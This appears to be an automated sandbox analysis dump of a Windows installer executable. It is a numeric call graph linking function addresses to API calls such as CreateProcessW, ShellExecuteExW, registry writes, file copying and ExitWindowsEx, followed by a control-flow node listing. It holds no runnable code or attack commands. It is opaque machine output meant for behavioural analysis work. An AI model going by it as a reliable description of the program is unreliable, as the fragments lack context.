402bb2 3908->3910 3912 402da6 17 API calls 3910->3912 3913 402b6e 3911->3913 3914 402bbb 3912->3914 3915 402d84 17 API calls 3913->3915 3914->3909 3916 402bbf IIDFromString 3914->3916 3918 402b7a 3915->3918 3916->3909 3917 402bce 3916->3917 3917->3909 3923 40666e lstrcpynW 3917->3923 3922 4065b5 wsprintfW 3918->3922 3920 402beb CoTaskMemFree 3920->3909 3922->3909 3923->3920 3924 402a5b 3925 402d84 17 API calls 3924->3925 3926 402a61 3925->3926 3927 402aa4 3926->3927 3928 402a88 3926->3928 3935 40292e 3926->3935 3929 402abe 3927->3929 3930 402aae 3927->3930 3931 402a8d 3928->3931 3932 402a9e 3928->3932 3934 4066ab 17 API calls 3929->3934 3933 402d84 17 API calls 3930->3933 3938 40666e lstrcpynW 3931->3938 3932->3935 3939 4065b5 wsprintfW 3932->3939 3933->3932 3934->3932 3938->3935 3939->3935 3940 403cdb 3941 403ce6 3940->3941 3942 403cea 3941->3942 3943 403ced GlobalAlloc 3941->3943 3943->3942 3712 40175c 3713 402da6 17 API calls 3712->3713 3714 401763 3713->3714 3715 40618d 2 API calls 3714->3715 3716 40176a 3715->3716 3717 40618d 2 API calls 3716->3717 3717->3716 3944 401d5d 3945 402d84 17 API calls 3944->3945 3946 401d6e SetWindowLongW 3945->3946 3947 402c2a 3946->3947 3948 4028de 3949 4028e6 3948->3949 3950 4028ea FindNextFileW 3949->3950 3952 4028fc 3949->3952 3951 402943 3950->3951 3950->3952 3954 40666e lstrcpynW 3951->3954 3954->3952 3955 401563 3956 402ba4 3955->3956 3959 4065b5 wsprintfW 3956->3959 3958 402ba9 3959->3958 3960 401968 3961 402d84 17 API calls 3960->3961 3962 40196f 3961->3962 3963 402d84 17 API calls 3962->3963 3964 40197c 3963->3964 3965 402da6 17 API calls 3964->3965 3966 401993 lstrlenW 3965->3966 3968 4019a4 3966->3968 3967 4019e5 3968->3967 3972 40666e lstrcpynW 3968->3972 3970 4019d5 3970->3967 3971 4019da lstrlenW 3970->3971 3971->3967 3972->3970 3973 40166a 3974 402da6 17 API calls 3973->3974 3975 401670 3974->3975 3976 4069a4 2 API calls 3975->3976 3977 401676 3976->3977 3978 402aeb 3979 402d84 17 API calls 3978->3979 3981 402af1 3979->3981 3980 40292e 3981->3980 3982 4066ab 17 API calls 3981->3982 3982->3980 3983 4026ec 3984 402d84 17 API calls 3983->3984 3985 4026fb 3984->3985 3986 402745 ReadFile 3985->3986 3987 4061e1 ReadFile 3985->3987 3989 402785 MultiByteToWideChar 3985->3989 3990 40283a 3985->3990 3992 4027ab SetFilePointer MultiByteToWideChar 3985->3992 3993 40284b 3985->3993 3995 402838 3985->3995 3996 40623f SetFilePointer 3985->3996 3986->3985 3986->3995 3987->3985 3989->3985 4005 4065b5 wsprintfW 3990->4005 3992->3985 3994 40286c SetFilePointer 3993->3994 3993->3995 3994->3995 3997 40625b 3996->3997 4004 406273 3996->4004 3998 4061e1 ReadFile 3997->3998 3999 406267 3998->3999 4000 4062a4 SetFilePointer 3999->4000 4001 40627c SetFilePointer 3999->4001 3999->4004 4000->4004 4001->4000 4002 406287 4001->4002 4003 406210 WriteFile 4002->4003 4003->4004 4004->3985 4005->3995 3718 40176f 3719 402da6 17 API calls 3718->3719 3720 401776 3719->3720 3721 401796 3720->3721 3722 40179e 3720->3722 3757 40666e lstrcpynW 3721->3757 3758 40666e lstrcpynW 3722->3758 3725 40179c 3729 4068f5 5 API calls 3725->3729 3726 4017a9 3727 405f3d 3 API calls 3726->3727 3728 4017af lstrcatW 3727->3728 3728->3725 3745 4017bb 3729->3745 3730 4069a4 2 API calls 3730->3745 3731 406139 2 API calls 3731->3745 3733 4017cd CompareFileTime 3733->3745 3734 40188d 3736 4056d0 24 API calls 3734->3736 3735 401864 3737 4056d0 24 API calls 3735->3737 3746 401879 3735->3746 3739 401897 3736->3739 3737->3746 3738 40666e lstrcpynW 3738->3745 3740 403377 40 API calls 3739->3740 3741 4018aa 3740->3741 3742 4018be SetFileTime 3741->3742 3744 4018d0 FindCloseChangeNotification 3741->3744 3742->3744 3743 4066ab 17 API calls 3743->3745 3744->3746 3747 4018e1 3744->3747 3745->3730 3745->3731 3745->3733 3745->3734 3745->3735 3745->3738 3745->3743 3753 405cce MessageBoxIndirectW 3745->3753 3756 40615e GetFileAttributesW CreateFileW 3745->3756 3748 4018e6 3747->3748 3749 4018f9 3747->3749 3751 4066ab 17 API calls 3748->3751 3750 4066ab 17 API calls 3749->3750 3752 401901 3750->3752 3754 4018ee lstrcatW 3751->3754 3755 405cce MessageBoxIndirectW 3752->3755 3753->3745 3754->3752 3755->3746 3756->3745 3757->3725 3758->3726 4006 401a72 4007 402d84 17 API calls 4006->4007 4008 401a7b 4007->4008 4009 402d84 17 API calls 4008->4009 4010 401a20 4009->4010 4011 401573 4012 401583 ShowWindow 4011->4012 4013 40158c 4011->4013 4012->4013 4014 402c2a 4013->4014 4015 40159a ShowWindow 4013->4015 4015->4014 4016 404a74 4017 404a84 4016->4017 4018 404aaa 4016->4018 4019 4045ca 18 API calls 4017->4019 4020 404631 8 API calls 4018->4020 4021 404a91 SetDlgItemTextW 4019->4021 4022 404ab6 4020->4022 4021->4018 4023 4023f4 4024 402da6 17 API calls 4023->4024 4025 402403 4024->4025 4026 402da6 17 API calls 4025->4026 4027 40240c 4026->4027 4028 402da6 17 API calls 4027->4028 4029 402416 GetPrivateProfileStringW 4028->4029 4030 4014f5 SetForegroundWindow 4031 402c2a 4030->4031 4032 401ff6 4033 402da6 17 API calls 4032->4033 4034 401ffd 4033->4034 4035 4069a4 2 API calls 4034->4035 4036 402003 4035->4036 4038 402014 4036->4038 4039 4065b5 wsprintfW 4036->4039 4039->4038 4040 401b77 4041 402da6 17 API calls 4040->4041 4042 401b7e 4041->4042 4043 402d84 17 API calls 4042->4043 4044 401b87 wsprintfW 4043->4044 4045 402c2a 4044->4045 4046 40167b 4047 402da6 17 API calls 4046->4047 4048 401682 4047->4048 4049 402da6 17 API calls 4048->4049 4050 40168b 4049->4050 4051 402da6 17 API calls 4050->4051 4052 401694 MoveFileW 4051->4052 4053 4016a7 4052->4053 4059 4016a0 4052->4059 4054 4069a4 2 API calls 4053->4054 4055 4022f6 4053->4055 4057 4016b6 4054->4057 4056 401423 24 API calls 4056->4055 4057->4055 4058 40642e 36 API calls 4057->4058 4058->4059 4059->4056 4060 4019ff 4061 402da6 17 API calls 4060->4061 4062 401a06 4061->4062 4063 402da6 17 API calls 4062->4063 4064 401a0f 4063->4064 4065 401a16 lstrcmpiW 4064->4065 4066 401a28 lstrcmpW 4064->4066 4067 401a1c 4065->4067 4066->4067 4068 4022ff 4069 402da6 17 API calls 4068->4069 4070 402305 4069->4070 4071 402da6 17 API calls 4070->4071 4072 40230e 4071->4072 4073 402da6 17 API calls 4072->4073 4074 402317 4073->4074 4075 4069a4 2 API calls 4074->4075 4076 402320 4075->4076 4077 402331 lstrlenW lstrlenW 4076->4077 4078 402324 4076->4078 4080 4056d0 24 API calls 4077->4080 4079 4056d0 24 API calls 4078->4079 4082 40232c 4078->4082 4079->4082 4081 40236f SHFileOperationW 4080->4081 4081->4078 4081->4082 4083 401000 4084 401037 BeginPaint GetClientRect 4083->4084 4085 40100c DefWindowProcW 4083->4085 4086 4010f3 4084->4086 4090 401179 4085->4090 4088 401073 CreateBrushIndirect FillRect DeleteObject 4086->4088 4089 4010fc 4086->4089 4088->4086 4091 401102 CreateFontIndirectW 4089->4091 4092 401167 EndPaint 4089->4092 4091->4092 4093 401112 6 API calls 4091->4093 4092->4090 4093->4092 4094 404700 lstrcpynW lstrlenW 4095 401d81 4096 401d94 GetDlgItem 4095->4096 4097 401d87 4095->4097 4100 401d8e 4096->4100 4098 402d84 17 API calls 4097->4098 4098->4100 4099 401dd5 GetClientRect LoadImageW SendMessageW 4103 401e33 4099->4103 4105 401e3f 4099->4105 4100->4099 4101 402da6 17 API calls 4100->4101 4101->4099 4104 401e38 DeleteObject 4103->4104 4103->4105 4104->4105 4106 401503 4107 40150b 4106->4107 4109 40151e 4106->4109 4108 402d84 17 API calls 4107->4108 4108->4109 4110 402383 4111 40238a 4110->4111 4113 40239d 4110->4113 4112 4066ab 17 API calls 4111->4112 4114 402397 4112->4114 4115 405cce MessageBoxIndirectW 4114->4115 4115->4113 4116 402c05 SendMessageW 4117 402c1f InvalidateRect 4116->4117 4118 402c2a 4116->4118 4117->4118 4119 404789 4121 4048bb 4119->4121 4122 4047a1 4119->4122 4120 404925 4123 4049ef 4120->4123 4124 40492f GetDlgItem 4120->4124 4121->4120 4121->4123 4130 4048f6 GetDlgItem SendMessageW 4121->4130 4125 4045ca 18 API calls 4122->4125 4129 404631 8 API calls 4123->4129 4126 4049b0 4124->4126 4127 404949 4124->4127 4128 404808 4125->4128 4126->4123 4133 4049c2 4126->4133 4127->4126 4132 40496f SendMessageW LoadCursorW SetCursor 4127->4132 4131 4045ca 18 API calls 4128->4131 4143 4049ea 4129->4143 4152 4045ec EnableWindow 4130->4152 4136 404815 CheckDlgButton 4131->4136 4156 404a38 4132->4156 4138 4049d8 4133->4138 4139 4049c8 SendMessageW 4133->4139 4135 404920 4153 404a14 4135->4153 4150 4045ec EnableWindow 4136->4150 4138->4143 4144 4049de SendMessageW 4138->4144 4139->4138 4144->4143 4145 404833 GetDlgItem 4151 4045ff SendMessageW 4145->4151 4147 404849 SendMessageW 4148 404866 GetSysColor 4147->4148 4149 40486f SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4147->4149 4148->4149 4149->4143 4150->4145 4151->4147 4152->4135 4154 404a22 4153->4154 4155 404a27 SendMessageW 4153->4155 4154->4155 4155->4120 4159 405c94 ShellExecuteExW 4156->4159 4158 40499e LoadCursorW SetCursor 4158->4126 4159->4158 4160 40248a 4161 402da6 17 API calls 4160->4161 4162 40249c 4161->4162 4163 402da6 17 API calls 4162->4163 4164 4024a6 4163->4164 4177 402e36 4164->4177 4167 4024de 4168 4024ea 4167->4168 4172 402d84 17 API calls 4167->4172 4173 402509 RegSetValueExW 4168->4173 4174 403377 40 API calls 4168->4174 4169 40292e 4170 402da6 17 API calls 4171 4024d4 lstrlenW 4170->4171 4171->4167 4172->4168 4175 40251f RegCloseKey 4173->4175 4174->4173 4175->4169 4178 402e51 4177->4178 4181 406509 4178->4181 4182 406518 4181->4182 4183 406523 RegCreateKeyExW 4182->4183 4184 4024b6 4182->4184 4183->4184 4184->4167 4184->4169 4184->4170 4185 40290b 4186 402da6 17 API calls 4185->4186 4187 402912 FindFirstFileW 4186->4187 4188 40293a 4187->4188 4192 402925 4187->4192 4193 4065b5 wsprintfW 4188->4193 4190 402943 4194 40666e lstrcpynW 4190->4194 4193->4190 4194->4192 4195 40190c 4196 401943 4195->4196 4197 402da6 17 API calls 4196->4197 4198 401948 4197->4198 4199 405d7a 67 API calls 4198->4199 4200 401951 4199->4200 4201 40190f 4202 402da6 17 API calls 4201->4202 4203 401916 4202->4203 4204 405cce MessageBoxIndirectW 4203->4204 4205 40191f 4204->4205 4206 40580f 4207 405830 GetDlgItem GetDlgItem GetDlgItem 4206->4207 4208 4059b9 4206->4208 4251 4045ff SendMessageW 4207->4251 4210 4059c2 GetDlgItem CreateThread CloseHandle 4208->4210 4211 4059ea 4208->4211 4210->4211 4213 405a01 ShowWindow ShowWindow 4211->4213 4214 405a3a 4211->4214 4215 405a15 4211->4215 4212 4058a0 4217 4058a7 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4212->4217 4253 4045ff SendMessageW 4213->4253 4221 404631 8 API calls 4214->4221 4216 405a75 4215->4216 4219 405a29 4215->4219 4220 405a4f ShowWindow 4215->4220 4216->4214 4226 405a83 SendMessageW 4216->4226 4224 405915 4217->4224 4225 4058f9 SendMessageW SendMessageW 4217->4225 4227 4045a3 SendMessageW 4219->4227 4222 405a61 4220->4222 4223 405a6f 4220->4223 4228 405a48 4221->4228 4229 4056d0 24 API calls 4222->4229 4230 4045a3 SendMessageW 4223->4230 4231 405928 4224->4231 4232 40591a SendMessageW 4224->4232 4225->4224 4226->4228 4233 405a9c CreatePopupMenu 4226->4233 4227->4214 4229->4223 4230->4216 4235 4045ca 18 API calls 4231->4235 4232->4231 4234 4066ab 17 API calls 4233->4234 4236 405aac AppendMenuW 4234->4236 4237 405938 4235->4237 4238 405ac9 GetWindowRect 4236->4238 4239 405adc TrackPopupMenu 4236->4239 4240 405941 ShowWindow 4237->4240 4241 405975 GetDlgItem SendMessageW 4237->4241 4238->4239 4239->4228 4243 405af7 4239->4243 4244 405964 4240->4244 4245 405957 ShowWindow 4240->4245 4241->4228 4242 40599c SendMessageW SendMessageW 4241->4242 4242->4228 4246 405b13 SendMessageW 4243->4246 4252 4045ff SendMessageW 4244->4252 4245->4244 4246->4246 4248 405b30 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4246->4248 4249 405b55 SendMessageW 4248->4249 4249->4249 4250 405b7e GlobalUnlock SetClipboardData CloseClipboard 4249->4250 4250->4228 4251->4212 4252->4241 4253->4215 4254 404e11 4255 404e21 4254->4255 4256 404e3d 4254->4256 4265 405cb2 GetDlgItemTextW 4255->4265 4258 404e70 4256->4258 4259 404e43 SHGetPathFromIDListW 4256->4259 4261 404e5a SendMessageW 4259->4261 4262 404e53 4259->4262 4260 404e2e SendMessageW 4260->4256 4261->4258 4264 40140b 2 API calls 4262->4264 4264->4261 4265->4260 4266 401491 4267 4056d0 24 API calls 4266->4267 4268 401498 4267->4268 4269 402891 4270 402898 4269->4270 4271 402ba9 4269->4271 4272 402d84 17 API calls 4270->4272 4273 40289f 4272->4273 4274 4028ae SetFilePointer 4273->4274 4274->4271 4275 4028be 4274->4275 4277 4065b5 wsprintfW 4275->4277 4277->4271 4278 401f12 4279 402da6 17 API calls 4278->4279 4280 401f18 4279->4280 4281 402da6 17 API calls 4280->4281 4282 401f21 4281->4282 4283 402da6 17 API calls 4282->4283 4284 401f2a 4283->4284 4285 402da6 17 API calls 4284->4285 4286 401f33 4285->4286 4287 401423 24 API calls 4286->4287 4288 401f3a 4287->4288 4295 405c94 ShellExecuteExW 4288->4295 4290 401f82 4291 406ae6 5 API calls 4290->4291 4293 40292e 4290->4293 4292 401f9f CloseHandle 4291->4292 4292->4293 4295->4290 4296 402f93 4297 402fa5 SetTimer 4296->4297 4298 402fbe 4296->4298 4297->4298 4299 40300c 4298->4299 4300 403012 MulDiv 4298->4300 4301 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 4300->4301 4301->4299 4303 401d17 4304 402d84 17 API calls 4303->4304 4305 401d1d IsWindow 4304->4305 4306 401a20 4305->4306 4307 401b9b 4308 401ba8 4307->4308 4309 401bec 4307->4309 4310 401c31 4308->4310 4317 401bbf 4308->4317 4311 401bf1 4309->4311 4312 401c16 GlobalAlloc 4309->4312 4313 4066ab 17 API calls 4310->4313 4321 40239d 4310->4321 4311->4321 4328 40666e lstrcpynW 4311->4328 4314 4066ab 17 API calls 4312->4314 4315 402397 4313->4315 4314->4310 4320 405cce MessageBoxIndirectW 4315->4320 4326 40666e lstrcpynW 4317->4326 4318 401c03 GlobalFree 4318->4321 4320->4321 4322 401bce 4327 40666e lstrcpynW 4322->4327 4324 401bdd 4329 40666e lstrcpynW 4324->4329 4326->4322 4327->4324 4328->4318 4329->4321 4330 40261c 4331 402da6 17 API calls 4330->4331 4332 402623 4331->4332 4335 40615e GetFileAttributesW CreateFileW 4332->4335 4334 40262f 4335->4334 4336 40149e 4337 4014ac PostQuitMessage 4336->4337 4338 40239d 4336->4338 4337->4338 4339 40259e 4349 402de6 4339->4349 4342 402d84 17 API calls 4343 4025b1 4342->4343 4344 4025d9 RegEnumValueW 4343->4344 4345 4025cd RegEnumKeyW 4343->4345 4347 40292e 4343->4347 4346 4025ee RegCloseKey 4344->4346 4345->4346 4346->4347 4350 402da6 17 API calls 4349->4350 4351 402dfd 4350->4351 4352 4064db RegOpenKeyExW 4351->4352 4353 4025a8 4352->4353 4353->4342 4354 4015a3 4355 402da6 17 API calls 4354->4355 4356 4015aa SetFileAttributesW 4355->4356 4357 4015bc 4356->4357 3287 401fa4 3288 402da6 17 API calls 3287->3288 3289 401faa 3288->3289 3290 4056d0 24 API calls 3289->3290 3291 401fb4 3290->3291 3302 405c51 CreateProcessW 3291->3302 3294 401fdd CloseHandle 3298 40292e 3294->3298 3297 401fcf 3299 401fd4 3297->3299 3300 401fdf 3297->3300 3310 4065b5 wsprintfW 3299->3310 3300->3294 3303 401fba 3302->3303 3304 405c84 CloseHandle 3302->3304 3303->3294 3303->3298 3305 406ae6 WaitForSingleObject 3303->3305 3304->3303 3306 406b00 3305->3306 3307 406b12 GetExitCodeProcess 3306->3307 3311 406a77 3306->3311 3307->3297 3310->3294 3312 406a94 PeekMessageW 3311->3312 3313 406aa4 WaitForSingleObject 3312->3313 3314 406a8a DispatchMessageW 3312->3314 3313->3306 3314->3312 4358 40202a 4359 402da6 17 API calls 4358->4359 4360 402031 4359->4360 4361 406a3b 5 API calls 4360->4361 4362 402040 4361->4362 4363 4020cc 4362->4363 4364 40205c GlobalAlloc 4362->4364 4364->4363 4365 402070 4364->4365 4366 406a3b 5 API calls 4365->4366 4367 402077 4366->4367 4368 406a3b 5 API calls 4367->4368 4369 402081 4368->4369 4369->4363 4373 4065b5 wsprintfW 4369->4373 4371 4020ba 4374 4065b5 wsprintfW 4371->4374 4373->4371 4374->4363 4375 40252a 4376 402de6 17 API calls 4375->4376 4377 402534 4376->4377 4378 402da6 17 API calls 4377->4378 4379 40253d 4378->4379 4380 402548 RegQueryValueExW 4379->4380 4383 40292e 4379->4383 4381 402568 4380->4381 4382 40256e RegCloseKey 4380->4382 4381->4382 4386 4065b5 wsprintfW 4381->4386 4382->4383 4386->4382 4387 4021aa 4388 402da6 17 API calls 4387->4388 4389 4021b1 4388->4389 4390 402da6 17 API calls 4389->4390 4391 4021bb 4390->4391 4392 402da6 17 API calls 4391->4392 4393 4021c5 4392->4393 4394 402da6 17 API calls 4393->4394 4395 4021cf 4394->4395 4396 402da6 17 API calls 4395->4396 4397 4021d9 4396->4397 4398 402218 CoCreateInstance 4397->4398 4399 402da6 17 API calls 4397->4399 4402 402237 4398->4402 4399->4398 4400 401423 24 API calls 4401 4022f6 4400->4401 4402->4400 4402->4401 3699 403c2b 3700 403c46 3699->3700 3701 403c3c CloseHandle 3699->3701 3702 403c50 CloseHandle 3700->3702 3703 403c5a 3700->3703 3701->3700 3702->3703 3708 403c88 3703->3708 3706 405d7a 67 API calls 3707 403c6b 3706->3707 3709 403c96 3708->3709 3710 403c5f 3709->3710 3711 403c9b FreeLibrary GlobalFree 3709->3711 3710->3706 3711->3710 3711->3711 4403 401a30 4404 402da6 17 API calls 4403->4404 4405 401a39 ExpandEnvironmentStringsW 4404->4405 4406 401a4d 4405->4406 4408 401a60 4405->4408 4407 401a52 lstrcmpW 4406->4407 4406->4408 4407->4408 4414 4023b2 4415 4023c0 4414->4415 4416 4023ba 4414->4416 4418 4023ce 4415->4418 4419 402da6 17 API calls 4415->4419 4417 402da6 17 API calls 4416->4417 4417->4415 4420 4023dc 4418->4420 4422 402da6 17 API calls 4418->4422 4419->4418 4421 402da6 17 API calls 4420->4421 4423 4023e5 WritePrivateProfileStringW 4421->4423 4422->4420 4424 402434 4425 402467 4424->4425 4426 40243c 4424->4426 4428 402da6 17 API calls 4425->4428 4427 402de6 17 API calls 4426->4427 4429 402443 4427->4429 4430 40246e 4428->4430 4432 40247b 4429->4432 4433 402da6 17 API calls 4429->4433 4435 402e64 4430->4435 4434 402454 RegDeleteValueW RegCloseKey 4433->4434 4434->4432 4436 402e78 4435->4436 4438 402e71 4435->4438 4436->4438 4439 402ea9 4436->4439 4438->4432 4440 4064db RegOpenKeyExW 4439->4440 4441 402ed7 4440->4441 4442 402f81 4441->4442 4443 402ee7 RegEnumValueW 4441->4443 4447 402f0a 4441->4447 4442->4438 4444 402f71 RegCloseKey 4443->4444 4443->4447 4444->4442 4445 402f46 RegEnumKeyW 4446 402f4f RegCloseKey 4445->4446 4445->4447 4448 406a3b 5 API calls 4446->4448 4447->4444 4447->4445 4447->4446 4449 402ea9 6 API calls 4447->4449 4450 402f5f 4448->4450 4449->4447 4450->4442 4451 402f63 RegDeleteKeyW 4450->4451 4451->4442 4452 401735 4453 402da6 17 API calls 4452->4453 4454 40173c SearchPathW 4453->4454 4455 401757 4454->4455 4456 405037 GetDlgItem GetDlgItem 4457 405089 7 API calls 4456->4457 4468 4052ae 4456->4468 4458 405130 DeleteObject 4457->4458 4459 405123 SendMessageW 4457->4459 4460 405139 4458->4460 4459->4458 4462 405170 4460->4462 4463 4066ab 17 API calls 4460->4463 4461 405390 4465 40543c 4461->4465 4475 4053e9 SendMessageW 4461->4475 4499 4052a1 4461->4499 4464 4045ca 18 API calls 4462->4464 4469 405152 SendMessageW SendMessageW 4463->4469 4470 405184 4464->4470 4466 405446 SendMessageW 4465->4466 4467 40544e 4465->4467 4466->4467 4477 405460 ImageList_Destroy 4467->4477 4478 405467 4467->4478 4489 405477 4467->4489 4468->4461 4473 404f85 5 API calls 4468->4473 4495 40531d 4468->4495 4469->4460 4474 4045ca 18 API calls 4470->4474 4471 405382 SendMessageW 4471->4461 4472 404631 8 API calls 4476 40563d 4472->4476 4473->4495 4486 405195 4474->4486 4480 4053fe SendMessageW 4475->4480 4475->4499 4477->4478 4481 405470 GlobalFree 4478->4481 4478->4489 4479 4055f1 4484 405603 ShowWindow GetDlgItem ShowWindow 4479->4484 4479->4499 4483 405411 4480->4483 4481->4489 4482 405270 GetWindowLongW SetWindowLongW 4485 405289 4482->4485 4490 405422 SendMessageW 4483->4490 4484->4499 4487 4052a6 4485->4487 4488 40528e ShowWindow 4485->4488 4486->4482 4491 40526b 4486->4491 4494 4051e8 SendMessageW 4486->4494 4496 405226 SendMessageW 4486->4496 4497 40523a SendMessageW 4486->4497 4509 4045ff SendMessageW 4487->4509 4508 4045ff SendMessageW 4488->4508 4489->4479 4498 405005 4 API calls 4489->4498 4503 4054b2 4489->4503 4490->4465 4491->4482 4491->4485 4494->4486 4495->4461 4495->4471 4496->4486 4497->4486 4498->4503 4499->4472 4500 4055bc 4501 4055c7 InvalidateRect 4500->4501 4504 4055d3 4500->4504 4501->4504 4502 4054e0 SendMessageW 4507 4054f6 4502->4507 4503->4502 4503->4507 4504->4479 4510 404f40 4504->4510 4506 40556a SendMessageW SendMessageW 4506->4507 4507->4500 4507->4506 4508->4499 4509->4468 4513 404e77 4510->4513 4512 404f55 4512->4479 4514 404e90 4513->4514 4515 4066ab 17 API calls 4514->4515 4516 404ef4 4515->4516 4517 4066ab 17 API calls 4516->4517 4518 404eff 4517->4518 4519 4066ab 17 API calls 4518->4519 4520 404f15 lstrlenW wsprintfW SetDlgItemTextW 4519->4520 4520->4512 4521 401d38 4522 402d84 17 API calls 4521->4522 4523 401d3f 4522->4523 4524 402d84 17 API calls 4523->4524 4525 401d4b GetDlgItem 4524->4525 4526 402638 4525->4526 4527 4014b8 4528 4014be 4527->4528 4529 401389 2 API calls 4528->4529 4530 4014c6 4529->4530 4531 40473a lstrlenW 4532 404759 4531->4532 4533 40475b WideCharToMultiByte 4531->4533 4532->4533 4534 404abb 4535 404ae7 4534->4535 4536 404af8 4534->4536 4595 405cb2 GetDlgItemTextW 4535->4595 4538 404b04 GetDlgItem 4536->4538 4543 404b63 4536->4543 4541 404b18 4538->4541 4539 404c47 4544 404df6 4539->4544 4597 405cb2 GetDlgItemTextW 4539->4597 4540 404af2 4542 4068f5 5 API calls 4540->4542 4546 404b2c SetWindowTextW 4541->4546 4547 405fe8 4 API calls 4541->4547 4542->4536 4543->4539 4543->4544 4548 4066ab 17 API calls 4543->4548 4551 404631 8 API calls 4544->4551 4550 4045ca 18 API calls 4546->4550 4552 404b22 4547->4552 4553 404bd7 SHBrowseForFolderW 4548->4553 4549 404c77 4554 406045 18 API calls 4549->4554 4555 404b48 4550->4555 4556 404e0a 4551->4556 4552->4546 4560 405f3d 3 API calls 4552->4560 4553->4539 4557 404bef CoTaskMemFree 4553->4557 4558 404c7d 4554->4558 4559 4045ca 18 API calls 4555->4559 4561 405f3d 3 API calls 4557->4561 4598 40666e lstrcpynW 4558->4598 4562 404b56 4559->4562 4560->4546 4563 404bfc 4561->4563 4596 4045ff SendMessageW 4562->4596 4566 404c33 SetDlgItemTextW 4563->4566 4571 4066ab 17 API calls 4563->4571 4566->4539 4567 404b5c 4569 406a3b 5 API calls 4567->4569 4568 404c94 4570 406a3b 5 API calls 4568->4570 4569->4543 4577 404c9b 4570->4577 4572 404c1b lstrcmpiW 4571->4572 4572->4566 4575 404c2c lstrcatW 4572->4575 4573 404cdc 4599 40666e lstrcpynW 4573->4599 4575->4566 4576 404ce3 4578 405fe8 4 API calls 4576->4578 4577->4573 4581 405f89 2 API calls 4577->4581 4583 404d34 4577->4583 4579 404ce9 GetDiskFreeSpaceW 4578->4579 4582 404d0d MulDiv 4579->4582 4579->4583 4581->4577 4582->4583 4584 404da5 4583->4584 4586 404f40 20 API calls 4583->4586 4585 404dc8 4584->4585 4587 40140b 2 API calls 4584->4587 4600 4045ec EnableWindow 4585->4600 4588 404d92 4586->4588 4587->4585 4590 404da7 SetDlgItemTextW 4588->4590 4591 404d97 4588->4591 4590->4584 4593 404e77 20 API calls 4591->4593 4592 404de4 4592->4544 4594 404a14 SendMessageW 4592->4594 4593->4584 4594->4544 4595->4540 4596->4567 4597->4549 4598->4568 4599->4576 4600->4592 4601 40263e 4602 402652 4601->4602 4603 40266d 4601->4603 4604 402d84 17 API calls 4602->4604 4605 402672 4603->4605 4606 40269d 4603->4606 4613 402659 4604->4613 4607 402da6 17 API calls 4605->4607 4608 402da6 17 API calls 4606->4608 4609 402679 4607->4609 4610 4026a4 lstrlenW 4608->4610 4618 406690 WideCharToMultiByte 4609->4618 4610->4613 4612 40268d lstrlenA 4612->4613 4614 4026e7 4613->4614 4616 40623f 5 API calls 4613->4616 4617 4026d1 4613->4617 4615 406210 WriteFile 4615->4614 4616->4617 4617->4614 4617->4615 4618->4612

                    Executed Functions

                    Function 00403646 Relevance: 88.0, APIs: 34, Strings: 16, Instructions: 450stringfilecomCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 403646-403696 SetErrorMode GetVersionExW 1 4036d0-4036d7 0->1 2 403698-4036cc GetVersionExW 0->2 3 4036e1-403721 1->3 4 4036d9 1->4 2->1 5 403723-40372b call 406a3b 3->5 6 403734 3->6 4->3 5->6 12 40372d 5->12 7 403739-40374d call 4069cb lstrlenA 6->7 13 40374f-40376b call 406a3b * 3 7->13 12->6 20 40377c-4037de #17 OleInitialize SHGetFileInfoW call 40666e GetCommandLineW call 40666e 13->20 21 40376d-403773 13->21 28 4037e0-4037e2 20->28 29 4037e7-4037fa call 405f6a CharNextW 20->29 21->20 26 403775 21->26 26->20 28->29 32 4038f1-4038f7 29->32 33 4038fd 32->33 34 4037ff-403805 32->34 37 403911-40392b GetTempPathW call 403615 33->37 35 403807-40380c 34->35 36 40380e-403814 34->36 35->35 35->36 39 403816-40381a 36->39 40 40381b-40381f 36->40 44 403983-40399b DeleteFileW call 4030d0 37->44 45 40392d-40394b GetWindowsDirectoryW lstrcatW call 403615 37->45 39->40 42 403825-40382b 40->42 43 4038df-4038ed call 405f6a 40->43 47 403845-40387e 42->47 48 40382d-403834 42->48 43->32 61 4038ef-4038f0 43->61 66 4039a1-4039a7 44->66 67 403b72-403b80 ExitProcess OleUninitialize 44->67 45->44 64 40394d-40397d GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403615 45->64 49 403880-403885 47->49 50 40389a-4038d4 47->50 54 403836-403839 48->54 55 40383b 48->55 49->50 56 403887-40388f 49->56 58 4038d6-4038da 50->58 59 4038dc-4038de 50->59 54->47 54->55 55->47 62 403891-403894 56->62 63 403896 56->63 58->59 65 4038ff-40390c call 40666e 58->65 59->43 61->32 62->50 62->63 63->50 64->44 64->67 65->37 71 4039ad-4039c0 call 405f6a 66->71 72 403a4e-403a55 call 403d1d 66->72 68 403b82-403b91 call 405cce ExitProcess 67->68 69 403b97-403b9d 67->69 75 403c15-403c1d 69->75 76 403b9f-403bb4 GetCurrentProcess OpenProcessToken 69->76 87 403a12-403a1f 71->87 88 4039c2-4039f7 71->88 80 403a5a-403a5d 72->80 81 403c22-403c25 ExitProcess 75->81 82 403c1f 75->82 84 403be5-403bf3 call 406a3b 76->84 85 403bb6-403bdf LookupPrivilegeValueW AdjustTokenPrivileges 76->85 80->67 82->81 98 403c01-403c0c ExitWindowsEx 84->98 99 403bf5-403bff 84->99 85->84 91 403a21-403a2f call 406045 87->91 92 403a62-403a76 call 405c39 lstrcatW 87->92 90 4039f9-4039fd 88->90 94 403a06-403a0e 90->94 95 4039ff-403a04 90->95 91->67 107 403a35-403a4b call 40666e * 2 91->107 105 403a83-403a9d lstrcatW lstrcmpiW 92->105 106 403a78-403a7e lstrcatW 92->106 94->90 101 403a10 94->101 95->94 95->101 98->75 100 403c0e-403c10 call 40140b 98->100 99->98 99->100 100->75 101->87 109 403b70 105->109 110 403aa3-403aa6 105->110 106->105 107->72 109->67 112 403aa8-403aad call 405b9f 110->112 113 403aaf call 405c1c 110->113 119 403ab4-403ac4 SetCurrentDirectoryW 112->119 113->119 121 403ad1-403afd call 40666e 119->121 122 403ac6-403acc call 40666e 119->122 126 403b02-403b1d call 4066ab DeleteFileW 121->126 122->121 129 403b5d-403b67 126->129 130 403b1f-403b2f CopyFileW 126->130 129->126 132 403b69-403b6b call 40642e 129->132 130->129 131 403b31-403b51 call 40642e call 4066ab call 405c51 130->131 131->129 140 403b53-403b5a CloseHandle 131->140 